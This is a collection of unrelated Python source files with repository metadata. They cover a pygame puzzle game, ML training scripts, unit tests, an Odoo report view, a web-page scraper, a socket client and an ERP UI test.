self.answer_size = answer_size
self.result = result
self.result_size = result_size
def encode_answer(answer):
encoded_answer = hashlib.sha1(answer.lower().encode()).hexdigest()
return encoded_answer
def run_puzzles(puzzle1, puzzle2, puzzle3, puzzle4, puzzle5, puzzle6):
pygame.init()
pygame.display.set_icon(pygame.image.load("util/puzzle_icon.png"))
pygame.display.set_caption('Word Search')
screen = pygame.display.set_mode((1000, 800))
background = pygame.Surface(screen.get_size())
background = background.convert(screen)
background.fill((30, 37, 41))
font = pygame.font.Font("util/FiraCode-Regular.ttf", 12)
font_bold = pygame.font.Font("util/FiraCode-Bold.ttf", 12)
allowed_keys = u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
final_answer_string = u''
running = True
text_color = pygame.Color(215, 218, 219, 255)
question_colour = pygame.Color(231, 132, 162, 255)
right_text_color = pygame.Color(60, 255, 255, 255)
wrong_text_color = pygame.Color(255, 200, 80, 255)
meta_text_color = pygame.Color(133, 152, 244, 255)
puzzle1.answer_hash = "24e7451df05ed5cd4cf1041be67c68f8d89d087a"
puzzle2.answer_hash = "063a6bf659ec1feb283f3b09d97c6814af62d134"
puzzle3.answer_hash = "48181acd22b3edaebc8a447868a7df7ce629920a"
puzzle4.answer_hash = "5737ef08a3ec16a337ac79a1d719fb91acba20a4"
puzzle5.answer_hash = "4c1f32a51dbf7d6943108c64980b6935762f87d2"
puzzle6.answer_hash = "56b80273da1d7c0ac32ce82840d543a9da755bfd"
puzzles = [puzzle1, puzzle2, puzzle3, puzzle4, puzzle5, puzzle6]
rendered_puzzles = []
puzzle_num = 1
for puzzle in puzzles:
task_text = font_bold.render("Puzzle " + str(puzzle_num) + ". " + puzzle.task, True, question_colour)
task_text_size = font.size("Puzzle " + str(puzzle_num) + ". " + puzzle.task)
answer_text = font.render("Your current answer is: " + puzzle.answer, True, text_color)
answer_text_size = font.size("Your current answer is: " + puzzle.answer)
answer_hash = hashlib.sha1(puzzle.answer.lower().encode()).hexdigest()
if answer_hash == puzzle.answer_hash:
result_text = font.render("This answer is correct!", True, right_text_color)
result_text_size = font.size("This answer is correct!")
result_text_size = [result_text_size[0], result_text_size[1] * 3]
puzzle.correct = True
else:
result_text = font.render("This answer is wrong.", True, wrong_text_color)
result_text_size = font.size("This answer is wrong.")
result_text_size = [result_text_size[0], result_text_size[1] * 3]
rendered_puzzles.append(RenderedPuzzle(task_text, task_text_size, answer_text,
answer_text_size, result_text, result_text_size))
puzzle_num += 1
if all(puzzle.correct for puzzle in puzzles):
all_correct = True
else:
all_correct = False
final_puzzle_text_1 = font_bold.render("CONGRATULATIONS! ALL NORMAL PUZZLES SOLVED. ", True, right_text_color)
final_puzzle_text_2 = font_bold.render("META PUZZLE UNLOCKED!", True, meta_text_color)
final_puzzle_text_3 = font.render("1. Enter the fourth letter of your first answer.", True, meta_text_color)
final_puzzle_text_4 = font.render("2. Enter the third letter of your fifth answer.", True, meta_text_color)
final_puzzle_text_5 = font.render("3. Enter the second letter of your third Answer.", True, meta_text_color)
final_puzzle_text_6 = font.render("4. Enter the second letter of your fourth answer.", True, meta_text_color)
final_puzzle_text_7 = font.render("5. Enter the second letter of your second answer.", True, meta_text_color)
final_puzzle_text_8 = font.render("6. Enter the eighth letter of your sixth answer.", True, meta_text_color)
final_puzzle_result_text = font_bold.render("CORRECT! FINAL META PUZZLE SOLVED!!! HOORAY!!!",
True, right_text_color)
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
elif event.key == K_BACKSPACE:
final_answer_string = final_answer_string[:-1]
elif all_correct:
if event.unicode in allowed_keys:
final_answer_string += event.unicode
if event.type == QUIT:
running = False
screen.blit(background, (0, 0))
y_height = 20
for puzzle in rendered_puzzles:
screen.blit(puzzle.task, puzzle.task.get_rect(x=20, y=y_height))
y_height += puzzle.task_size[1]
screen.blit(puzzle.answer, puzzle.answer.get_rect(x=20, y=y_height))
y_height += puzzle.answer_size[1]
screen.blit(puzzle.result, puzzle.result.get_rect(x=20, y=y_height))
y_height += puzzle.result_size[1]
if all_correct:
screen.blit(final_puzzle_text_1, (20, y_height))
x_adjust = final_puzzle_text_1.get_rect().width
screen.blit(final_puzzle_text_2, (20 + x_adjust, y_height))
y_height += final_puzzle_text_2.get_rect().height*2
screen.blit(final_puzzle_text_3, (20, y_height))
y_height += final_puzzle_text_3.get_rect().height
screen.blit(final_puzzle_text_4, (20, y_height))
y_height += final_puzzle_text_4.get_rect().height
screen.blit(final_puzzle_text_5, (20, y_height))
y_height += final_puzzle_text_5.get_rect().height
screen.blit(final_puzzle_text_6, (20, y_height))
y_height += final_puzzle_text_6.get_rect().height
screen.blit(final_puzzle_text_7, (20, y_height))
y_height += final_puzzle_text_7.get_rect().height
screen.blit(final_puzzle_text_8, (20, y_height))
y_height += final_puzzle_text_8.get_rect().height*2
answer_text = font.render("Answer: " + final_answer_string, True, text_color)
screen.blit(answer_text, answer_text.get_rect(x=20, y=y_height))
y_height += font.size("Answer: " + final_answer_string)[1]*2
final_answer = final_answer_string.lower()
if encode_answer(final_answer) == "59c826fc854197cbd4d1083bce8fc00d0761e8b3":
screen.blit(final_puzzle_result_text, (20, y_height))
pygame.display.flip() # flip all our drawn stuff onto the screen
pygame.quit()
|
[
"dan@myrespace.com"
] |
dan@myrespace.com
|
031216c936d39754abde2a11c2e9bc24bcd35fdf
|
9560e118fafa944de93c5f6aec92a41a53825068
|
/webaskb_run.py
|
07997f0184ac34ea0c8d6c1d7cf93247b9085020
|
[] |
no_license
|
cimeister/WebAsKB
|
6bedd567646495f3af8daf939cbf4ff9d674ee6e
|
b8f4488ce9a226bca0f0cff278cc84fd7d2d1f6c
|
refs/heads/master
| 2022-01-06T05:49:44.402051
| 2019-05-24T13:58:55
| 2019-05-24T13:58:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,265
|
py
|
from config import *
from SplitQA import SplitQA
from noisy_supervision import NoisySupervision
from webaskb_ptrnet import WebAsKB_PtrNet
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("operation", help='available operations: "gen_noisy_sup","run_ptrnet" ,"train_ptrnet", "splitqa"')
parser.add_argument("--eval_set", help='available eval sets: "dev","test"')
args = parser.parse_args()
if args.eval_set is not None:
config.EVALUATION_SET = args.eval_set
if args.operation == 'gen_noisy_sup':
noisy_sup = NoisySupervision()
noisy_sup.gen_noisy_supervision()
elif args.operation == 'run_ptrnet':
ptrnet = WebAsKB_PtrNet()
ptrnet.load_data()
ptrnet.init()
ptrnet.eval()
elif args.operation == 'train_ptrnet':
config.PERFORM_TRAINING = True
config.LOAD_SAVED_MODEL = False
config.max_evalset_size = 2000
ptrnet = WebAsKB_PtrNet()
ptrnet.load_data()
ptrnet.init()
ptrnet.train()
elif args.operation == 'splitqa':
config.PERFORM_TRAINING = False
splitqa = SplitQA()
splitqa.run_executors()
splitqa.gen_predictions_file()
splitqa.compute_final_results()
else:
print('option not found, available operations: "gen_noisy_sup","run_ptrnet" ,"train_ptrnet", "splitqa"')
|
[
"salont@gmail.com"
] |
salont@gmail.com
|
2e295fa94dd0fee0546ab2840203eef3f5a2ae4e
|
14453c13d552165cabe72a310f44f7c58eaacad0
|
/tests/main/dsl/test_skip_passes.py
|
7cb4376f18205ffa80bb6f7e6da33bcb8a3eb791
|
[
"Apache-2.0"
] |
permissive
|
ai2cm/pace
|
76a98ffae3baa92bd3b2ddc422b50dfa50255642
|
c543e8ec478d46d88b48cdd3beaaa1717a95b935
|
refs/heads/main
| 2023-07-06T07:18:11.558315
| 2022-12-22T21:45:34
| 2022-12-22T21:45:34
| 392,106,887
| 27
| 13
|
Apache-2.0
| 2023-07-03T13:47:46
| 2021-08-02T22:05:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,193
|
py
|
import unittest.mock
# will need to update this import when gt4py is updated
from gt4py.cartesian.gtc.passes.oir_optimizations.horizontal_execution_merging import (
HorizontalExecutionMerging,
)
from gt4py.cartesian.gtc.passes.oir_pipeline import DefaultPipeline
from gt4py.cartesian.gtscript import PARALLEL, computation, interval
from pace.dsl.dace.dace_config import DaceConfig
from pace.dsl.stencil import (
CompilationConfig,
GridIndexing,
StencilConfig,
StencilFactory,
)
from pace.dsl.typing import FloatField
from pace.util import X_DIM, Y_DIM, Z_DIM
def stencil_definition(a: FloatField):
with computation(PARALLEL), interval(...):
a = 0.0
def test_skip_passes_becomes_oir_pipeline():
backend = "numpy"
dace_config = DaceConfig(None, backend)
config = StencilConfig(
compilation_config=CompilationConfig(backend=backend), dace_config=dace_config
)
grid_indexing = GridIndexing(
domain=(4, 4, 7),
n_halo=3,
south_edge=False,
north_edge=False,
west_edge=False,
east_edge=False,
)
factory = StencilFactory(config=config, grid_indexing=grid_indexing)
with unittest.mock.patch(
"gt4py.cartesian.gtscript.stencil"
) as mock_stencil_builder:
factory.from_dims_halo(
stencil_definition,
compute_dims=[X_DIM, Y_DIM, Z_DIM],
)
pipeline: DefaultPipeline = mock_stencil_builder.call_args.kwargs.get(
"oir_pipeline", DefaultPipeline()
)
assert HorizontalExecutionMerging not in pipeline.skip
assert HorizontalExecutionMerging in pipeline.steps
with unittest.mock.patch(
"gt4py.cartesian.gtscript.stencil"
) as mock_stencil_builder:
factory.from_dims_halo(
stencil_definition,
compute_dims=[X_DIM, Y_DIM, Z_DIM],
skip_passes=("HorizontalExecutionMerging",),
)
assert "oir_pipeline" in mock_stencil_builder.call_args.kwargs
pipeline: DefaultPipeline = mock_stencil_builder.call_args.kwargs["oir_pipeline"]
assert HorizontalExecutionMerging in pipeline.skip
assert HorizontalExecutionMerging not in pipeline.steps
|
[
"noreply@github.com"
] |
ai2cm.noreply@github.com
|
99bbd9d46836511c97535c041251b08e19961ac9
|
a2062cce9fbc6a5392e188ffc1babd26f05e7814
|
/numpytutorial/basic/tutorial/multiplication.py
|
8cebe2369875b13916937e2b339ab2c1d3d6a809
|
[] |
no_license
|
rohitaswchoudhary/spy_tutorial
|
65fa62b25891a076245cf6a1093ba8ccb9932d3c
|
0afdb9492f34a59a15d0531de5ca64d8ef8422af
|
refs/heads/main
| 2023-06-02T14:52:16.752137
| 2021-06-17T06:54:59
| 2021-06-17T06:54:59
| 328,871,875
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
import numpy as np
x = np.array([[1,3,0], [-1,2,1], [0, 0, 2]])
y = np.matrix([[2, 3, 4], [1,2,3], [-1,1,2]])
print(np.dot(x, y))
print(np.dot(y, x))
print(x==y)
|
[
"you@example.com"
] |
you@example.com
|
2e9d806506c0eb1a705e0a484e74b7e78d806147
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/kepler_bd/sdB_kepler_bd_coadd.py
|
848fd3775b6bb4cab1b38014fff779fb2a41155a
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
WINDOWS-1252
|
Python
| false
| false
| 421
|
py
|
from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[+42¡3250,286.91875], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_kepler_bd/sdB_kepler_bd_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_kepler_bd/sdB_kepler_bd_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
f41ecf32c0cbade99fe1da798f042464bfb10985
|
c3082eb2adc43b311dd3c9ff16fd3ed9df85f266
|
/python/examples/pytest/fib7/test_fibonacci.py
|
412bfcf25a359af1ef1610c04a755329dca30286
|
[] |
no_license
|
szabgab/slides
|
78818c7138331b3ba9e221c81da3678a46efe9b3
|
63bba06678554db737602f2fbcd6510c36037e8a
|
refs/heads/main
| 2023-08-31T07:13:51.536711
| 2023-08-29T13:17:59
| 2023-08-29T13:17:59
| 122,212,527
| 87
| 69
| null | 2023-05-19T06:55:11
| 2018-02-20T14:57:03
|
Python
|
UTF-8
|
Python
| false
| false
| 540
|
py
|
import pytest
from fibonacci import fib
def test_fib():
assert fib(10) == 55
def test_fib_negative():
with pytest.raises(Exception) as err:
fib(-1)
assert err.type == ValueError
assert str(err.value) == 'Invalid parameter -1'
def test_fib_negative_again():
with pytest.raises(ValueError) as err:
fib(-1)
assert str(err.value) == 'Invalid parameter -1'
def test_fib_negative_again():
with pytest.raises(ValueError) as err:
fib(3.5)
assert str(err.value) == 'Invalid parameter 3.5'
|
[
"gabor@szabgab.com"
] |
gabor@szabgab.com
|
7415b1fe6c3fef75bcb7ef26e5dc8d6ae6afa1de
|
7c384a56e1bcd66ad4ee4b9dd413c49ff9f71bf1
|
/mario.py
|
cd382e705f6e9b24ee0eb3b92eaf1623ec3f2094
|
[] |
no_license
|
Rouen007/mario
|
d9405c016ac172d5b38c26fa239a27be51662448
|
da5a678feefdcf3e8b220c1c6e8fd0ef67f285b7
|
refs/heads/master
| 2020-09-27T07:08:55.213068
| 2017-10-07T22:38:20
| 2017-10-07T22:38:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,822
|
py
|
#!/usr/bin/env python
"""Mario Gym Adventure!
python mario.py ppaquette/meta-SuperMarioBros-v0 \
-a DQFDAgent -c mario_agent.json \
-ld ./demos/ -s ./agents/ -m ./monitors/ -mv 1000 -D
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import logging
import os
import demo
from model import mario_net
from ppaquette_gym_super_mario import wrappers
from tensorforce import Configuration, TensorForceError
from tensorforce.agents import agents
from tensorforce.contrib.openai_gym import OpenAIGym
from tensorforce.execution import Runner
def main():
parser = argparse.ArgumentParser()
parser.add_argument('gym_id', help="ID of the gym environment, i.e. ppaquette/SuperMarioBros-1-1-v0")
parser.add_argument('-a', '--agent', help='Agent')
parser.add_argument('-c', '--agent-config', help="Agent configuration file")
parser.add_argument('-e', '--episodes', type=int, default=50000, help="Number of episodes")
parser.add_argument('-t', '--max-timesteps', type=int, default=100000, help="Maximum number of timesteps per episode")
parser.add_argument('-m', '--monitor', help="Save results to this directory")
parser.add_argument('-ms', '--monitor-safe', action='store_true', default=False, help="Do not overwrite previous results")
parser.add_argument('-mv', '--monitor-video', type=int, default=0, help="Save video every x steps (0 = disabled)")
parser.add_argument('-s', '--save', help="Save agent to this dir")
parser.add_argument('-se', '--save-episodes', type=int, default=100, help="Save agent every x episodes")
parser.add_argument('-l', '--load', help="Load agent from this dir")
parser.add_argument('-D', '--debug', action='store_true', default=False, help="Show debug outputs")
parser.add_argument('-ld', '--load-demo', required=True, help="Load demos from this dir")
parser.add_argument('-pt', '--pretrain', action='store_true', default=False, help="Pretrain agent on demos")
parser.add_argument('-ul', '--use_lstm', action='store_true', default=False, help="Use LSTM model")
parser.add_argument('-ls', '--lstm_size', type=int, default=256, help="LSTM size")
args = parser.parse_args()
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
environment = OpenAIGym(args.gym_id,
monitor=args.monitor,
monitor_safe=args.monitor_safe,
monitor_video=args.monitor_video)
mode_wrapper = wrappers.SetPlayingMode('algo')
ac_wrapper = wrappers.ToDiscrete()
environment.gym = mode_wrapper(ac_wrapper(environment.gym))
if args.agent_config:
agent_config = Configuration.from_json(args.agent_config)
else:
agent_config = Configuration()
logger.info("No agent configuration provided.")
agent_config.default(dict(states=environment.states,
actions=environment.actions,
network=mario_net(name='mario',
lstm_size=args.lstm_size,
actions=environment.actions['num_actions'],
use_lstm=args.use_lstm)))
agent = agents[args.agent](config=agent_config)
if args.load:
load_dir = os.path.dirname(args.load)
if not os.path.isdir(load_dir):
raise OSError("Could not load agent from {}: No such directory.".format(load_dir))
logger.info("-" * 16)
agent.load_model(args.load)
logger.info("Loaded {}".format(agent))
if args.debug:
logger.info("-" * 16)
logger.info("Configuration:")
logger.info(agent_config)
if args.save:
save_dir = os.path.dirname(args.save)
if not os.path.isdir(save_dir):
try:
os.mkdir(save_dir, 0o755)
except OSError:
raise OSError("Cannot save agent to dir {} ()".format(save_dir))
try:
if args.load_demo:
logger.info("-" * 16)
logger.info("Loading demos")
demos = demo.load(args.load_demo)
logger.info("Importing demos")
agent.import_demonstrations(demos)
if args.pretrain:
logger.info("-" * 16)
logger.info("Pretraining {} steps".format(len(demos)))
agent.pretrain(steps=len(demos))
runner = Runner(
agent=agent,
environment=environment,
repeat_actions=1,
save_path=args.save,
save_episodes=args.save_episodes
)
report_episodes = args.episodes // 1000
if args.debug:
report_episodes = 1
def episode_finished(r):
if r.episode % report_episodes == 0:
logger.info("Finished episode {ep} after {ts} timesteps".format(ep=r.episode, ts=r.timestep))
logger.info("Episode reward: {}".format(r.episode_rewards[-1]))
logger.info("Average of last 500 rewards: {}".format(sum(r.episode_rewards[-500:]) / 500))
logger.info("Average of last 100 rewards: {}".format(sum(r.episode_rewards[-100:]) / 100))
return True
logger.info("Starting {agent} for Environment '{env}'".format(agent=agent, env=environment))
runner.run(args.episodes, args.max_timesteps, episode_finished=episode_finished)
logger.info("Learning finished. Total episodes: {ep}".format(ep=runner.episode))
except (KeyboardInterrupt):
agent.save_model(args.save)
pass
if args.monitor:
environment.gym.monitor.close()
environment.close()
if __name__ == '__main__':
main()
|
[
"samwenke@gmail.com"
] |
samwenke@gmail.com
|
adc963ff1204c00fb87b90795664b46370b2735d
|
a1e10efa6a131e305351909a437bfa5d083d4513
|
/summary_product_report/reports/product_sales_qty_report/product_sales_qty_report.py
|
399f5bde169bc9bdd57785835dabc268a4757791
|
[] |
no_license
|
h3llopy/glodok_extra_addons_od12
|
5089412b36b0dafdb17235a627c8e33ed2acbb1f
|
5c493962b93254fb2ca8cd674c4fe153ac86d680
|
refs/heads/master
| 2022-12-05T06:22:08.182302
| 2020-08-29T14:32:30
| 2020-08-29T14:32:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,188
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api, _,tools
from odoo.exceptions import UserError,ValidationError
import logging
_logger = logging.getLogger(__name__)
class ProductSalesQtyReport(models.Model):
_name = 'product.sales.qty.report'
_description = 'Product Sales Qty Report'
_auto = False
product_id = fields.Many2one('product.product', string="Product", readonly=True)
product_tmpl_id = fields.Many2one('product.template', string="Product Templat", readonly=True)
product_uom_qty = fields.Float('Qty', readonly=True, group_operator='sum')
date_series = fields.Date(string="Date Series", readonly=True)
uom_id = fields.Many2one('product.uom', string="UOM", related="product_tmpl_id.uom_id", readonly=True)
def _select(self):
query = """
WITH series AS (
SELECT date_trunc('day', dd)::date as ds
FROM generate_series(
(
SELECT NOW()-(CONCAT(icp.value,' day')::interval)
FROM ir_config_parameter icp
-- WHERE key='auth_signup.template_user_id'
WHERE key='interval.product_sales_qty_report'
)
, now()::timestamp
, '1 day'::interval
) dd
)
SELECT
CONCAT(to_char(series.ds, 'YYYYMMDD'), LPAD(prod.product_tmpl_id::text,4,'0'))::bigint AS id
,prod.id as product_id
,prod.product_tmpl_id
,SUM(CASE WHEN ps.product_id is NOT NULL THEN ps.product_uom_qty ELSE 0 END) AS product_uom_qty
,series.ds as date_series
FROM series
CROSS JOIN product_product prod
LEFT JOIN (
SELECT
pp.id as product_id
,pp.product_tmpl_id
,(CASE WHEN sol.id IS NOT NULL THEN sol.product_uom_qty ELSE 0 END) AS product_uom_qty
,so.date_order
,so.id as so_id
FROM product_product AS pp
LEFT JOIN sale_order_line AS sol ON sol.product_id = pp.id AND sol.state='done'
LEFT JOIN sale_order AS so ON so.id = sol.order_id
) ps ON prod.id=ps.product_id and series.ds::date = ps.date_order::date
GROUP BY prod.id,series.ds
"""
return query
@api.model_cr
def init(self):
tools.drop_view_if_exists(self.env.cr, self._table)
self.env.cr.execute("""CREATE or REPLACE VIEW %s as (
%s
)""" % (self._table, self._select()))
|
[
"kikin.kusumah@gmail.com"
] |
kikin.kusumah@gmail.com
|
7ea725be597104cfa2dac6fd1b1f81b9726da36d
|
13f4a06cd439f579e34bf38406a9d5647fe7a0f3
|
/script/try_python/try_Django/mzitu_com/mzitu_com_project/mzitu_com_project/home_page_transform.py
|
595accd90ae239ec0258a9fae2673b5f268d2f68
|
[] |
no_license
|
edt-yxz-zzd/python3_src
|
43d6c2a8ef2a618f750b59e207a2806132076526
|
41f3a506feffb5f33d4559e5b69717d9bb6303c9
|
refs/heads/master
| 2023-05-12T01:46:28.198286
| 2023-05-01T13:46:32
| 2023-05-01T13:46:32
| 143,530,977
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,505
|
py
|
__all__ = '''
home_page_transform__url
home_page_transform__page
extract_mzitu_com__the_all_or_old_page
'''.split()
#NotFoundError
#find
from nn_ns.internet.webpage.fetch_webpage import fetch_webpage
from seed.helper.repr_input import repr_helper
from bs4 import BeautifulSoup
import re
from urllib.parse import urlparse, urlunparse
from pathlib import PurePosixPath as Path
from .DATA import project_per_page_url_route
r'''
def make_project_per_page_url_base(new_url):
parse_result = urlparse(new_url)
parts = (parse_result.scheme, parse_result.netloc, project_per_page_url_route, '', '', '')
project_per_page_url_base = urlunparse(parts)
return project_per_page_url_base
'''
r'''
def home_page_transform__url(old_url, new_project_website):
# .DATA.website_all_old/website_all_new
# e.g. home_page_transform__url(.DATA.website_all_old, 'http://127.0.0.1:8000/')
# e.g. home_page_transform__url('https://www.mzitu.com/old/', 'http://127.0.0.1:8000/')
# e.g. home_page_transform__url('https://www.mzitu.com/all/', 'http://127.0.0.1:8000/')
#
assert new_project_website[-1:] == '/'
'''
project_per_page_url_relative_base = Path(project_per_page_url_route)
def home_page_transform__url(old_url):
# .DATA.website_all_old/website_all_new
# e.g. home_page_transform__url(.DATA.website_all_old)
# e.g. home_page_transform__url('https://www.mzitu.com/old/')
# e.g. home_page_transform__url('https://www.mzitu.com/all/')
#
html_page = fetch_webpage(old_url)
#project_per_page_url_base = make_project_per_page_url_base(new_url)
assert project_per_page_url_route[:1] == '/'
#project_per_page_url_base = new_project_website + project_per_page_url_route[1:]
#project_per_page_url_base = Path(new_project_website, project_per_page_url_route)
project_per_page_url_base = project_per_page_url_relative_base
return home_page_transform__page(html_page, project_per_page_url_base)
class NotFoundError(Exception):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def __repr__(self):
return repr_helper(self, *self.args, **self.kwargs)
def find(soup_find, *args, **kwargs):
may_r = soup_find(*args, **kwargs)
if may_r is None: raise NotFoundError(*args, **kwargs)
r = may_r
return r
def extract_mzitu_com__the_all_or_old_page(html_page):
# html_page of .../all/ or .../old/
#
# html_page -> (html_title, [((year::str, month::str), [(old_url::str, title::str)])])
#
soup = BeautifulSoup(html_page, 'lxml')
[html_title] = soup.head.find_all('title')
html_title = html_title.get_text()
[class_main] = soup.find_all('div', {'class': 'main'})
[class_all] = class_main.find_all('div', {'class': 'all'})
class_years = class_all.find_all('div', {'class': 'year'})
#what's the name of tail-string?#?No such name in bs4?
#print(dir(class_main))
#import sys; sys.exit()
year_month__url_title_pairs__pairs = []
for class_year in class_years:
year = class_year.get_text()
class_archives = find(class_year.find_next_sibling, 'ul', {'class':'archives'})
class_monthes = class_archives.find_all('p', {'class': 'month'})
for class_month in class_monthes:
month = class_month.get_text()
class_url = find(class_month.find_next_sibling, 'p', {'class':'url'})
href_children = class_url.find_all('a')
year_month = year, month
url_title_pairs = []
for href_child in href_children:
url = href_child['href']
title = href_child.get_text()
url_title_pairs.append((url, title))
year_month__url_title_pairs__pairs.append((year_month, url_title_pairs))
return html_title, year_month__url_title_pairs__pairs
new_html_begin = r'''
<!DOCTYPE html>
<html>
<head> <title></title> </head>
<body>
<ul>
</ul>
</body>
</html>
'''
body_tpl = r'''
{year} {month} {new_url} {title}
'''
def old_url2new_url(old_url, project_per_page_url_base:Path):
project_per_page_url = project_per_page_url_base / Path(old_url).name
new_url = project_per_page_url
return new_url
def home_page_transform__page(html_page, project_per_page_url_base:Path):
(html_title, year_month__url_title_pairs__pairs
) = extract_mzitu_com__the_all_or_old_page(html_page)
new_soup = BeautifulSoup(new_html_begin, 'lxml')
[new_title_tag] = new_soup.find_all('title')
new_title_tag.append(html_title)
[new_ul_tag] = new_soup.find_all('ul')
for (year, month), url_title_pairs in year_month__url_title_pairs__pairs:
new_li_tag = new_soup.new_tag('li')
new_ul_tag.append(new_li_tag)
fst_new_p_tag = new_soup.new_tag('p')
new_li_tag.append(fst_new_p_tag)
fst_new_p_tag.string = f'{year} {month}'
snd_new_p_tag = new_soup.new_tag('p')
new_li_tag.append(snd_new_p_tag)
for old_url, title in url_title_pairs:
new_url = old_url2new_url(old_url, project_per_page_url_base)
new_href_tag = new_soup.new_tag('a', href=new_url, target="_blank")
new_href_tag.string = title
new_br_tag = new_soup.new_tag('br')
snd_new_p_tag.append(new_href_tag)
snd_new_p_tag.append(new_br_tag)
#new_html_page = new_soup.encode('gb18030')
new_html_page = str(new_soup)
return new_html_page
|
[
"wuming_zher@zoho.com.cn"
] |
wuming_zher@zoho.com.cn
|
eb7284de08d0db2639a08a3dc6348c377f0be6e4
|
b53e3d57d31a47a98d87141e44a5f8940ee15bca
|
/src/utils/socket_client/socket_client.py
|
d64c219641216ff48c67160faa9ad2d93b41bdeb
|
[
"MIT"
] |
permissive
|
Chrissimple/program-y
|
52177fcc17e75fb97ab3993a4652bcbe7906bd58
|
80d80f0783120c2341e6fc57e7716bbbf28a8b3f
|
refs/heads/master
| 2020-03-29T13:20:08.162177
| 2018-09-26T19:09:20
| 2018-09-26T19:09:20
| 149,952,995
| 1
| 0
| null | 2018-09-23T06:11:04
| 2018-09-23T06:11:04
| null |
UTF-8
|
Python
| false
| false
| 651
|
py
|
# client.py
import socket
import sys
import json
host = sys.argv[1]
port = int(sys.argv[2])
question = sys.argv[3]
clientid = sys.argv[4]
max_size = 1024
if len(sys.argv) == 6:
max_size = sys.argv[5]
payload = {"question": question, "clientid": clientid}
json_data = json.dumps(payload)
# create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connection to hostname on the port.
s.connect((host, port))
s.send(json_data.encode('utf-8'))
# Receive no more than 1024 bytes
received = s.recv(max_size)
s.close()
json_data = json.loads(received.decode('utf-8'))
print("Answer: %s" % json_data['answer'])
|
[
"keith@keithsterling.com"
] |
keith@keithsterling.com
|
c5a78fbd2e9b6d4765751767fa9482d51b71cf16
|
7986ec6498e3f93967fa9bfe2b6a9d4056138293
|
/Protheus_WebApp/Modules/SIGAFIN/FINA171TESTCASE.py
|
d514f8aee6362dfcd0583815fa42b1334b983c59
|
[
"MIT"
] |
permissive
|
HelenaAdrignoli/tir-script-samples
|
7d08973e30385551ef13df15e4410ac484554303
|
bb4f4ab3a49f723216c93f66a4395e5aa328b846
|
refs/heads/master
| 2023-02-21T11:26:28.247316
| 2020-04-28T16:37:26
| 2020-04-28T16:37:26
| 257,304,757
| 0
| 0
|
MIT
| 2020-04-20T14:22:21
| 2020-04-20T14:22:20
| null |
UTF-8
|
Python
| false
| false
| 1,786
|
py
|
from tir import Webapp
import unittest
class FINA171(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup('SIGAFIN','12/09/2019','T1','D MG 01 ','06')
inst.oHelper.Program("FINA171")
def test_FINA171_CT006(self):
self.oHelper.SetButton("Incluir")
self.oHelper.SetBranch('D MG 01')
self.oHelper.SetValue('Numero','FITIR1')
self.oHelper.SetValue('Modelo',"A")
self.oHelper.SetValue('Operacao',"CDB")
self.oHelper.SetValue('Banco',"033")
self.oHelper.SetValue('Agencia', '00001')
self.oHelper.SetValue('Conta Banco', '0000000004')
self.oHelper.SetValue('Vlr.Operacao', '1000,00')
self.oHelper.SetValue('Moeda', '1')
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Cancelar")
self.oHelper.SetButton("Visualizar")
self.oHelper.CheckResult('EH_NUMERO','FITIR1')
self.oHelper.CheckResult('EH_APLEMP','APL')
self.oHelper.CheckResult('EH_TIPO','CDB')
self.oHelper.CheckResult('EH_BANCO','033')
self.oHelper.CheckResult('EH_AGENCIA','00001')
self.oHelper.CheckResult('EH_CONTA','0000000004')
self.oHelper.CheckResult('EH_VALOR','1000,00')
self.oHelper.SetButton("Cancelar")
self.oHelper.SearchBrowse(f"D MG 01 FITIR101")
self.oHelper.SetButton("Outras Ações", "Excluir")
self.oHelper.CheckResult('EH_NUMERO','FITIR1')
self.oHelper.CheckResult('EH_APLEMP','APL')
self.oHelper.CheckResult('EH_TIPO','CDB')
self.oHelper.CheckResult('EH_BANCO','033')
self.oHelper.CheckResult('EH_AGENCIA','00001')
self.oHelper.CheckResult('EH_CONTA','0000000004')
self.oHelper.CheckResult('EH_VALOR','1000,00')
self.oHelper.SetButton("Confirmar")
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == "__main__":
unittest.main()
|
[
"hadrignoli@gmail.com"
] |
hadrignoli@gmail.com
|
cd1d00359df9774b800509d1661d19dd46beb71a
|
61bccf4117ba351365a2526603024a0e99e2559f
|
/pseudo/api_translators/python_api_handlers.py
|
3c5ed44386fdc67cbeaac8e5745a3471fdeff16d
|
[
"MIT"
] |
permissive
|
gitter-badger/pseudo
|
781363ee0c116ee0d7dfce968b007708a33c8bc4
|
070a2649d47170927184ad19af8c32c7be4f7612
|
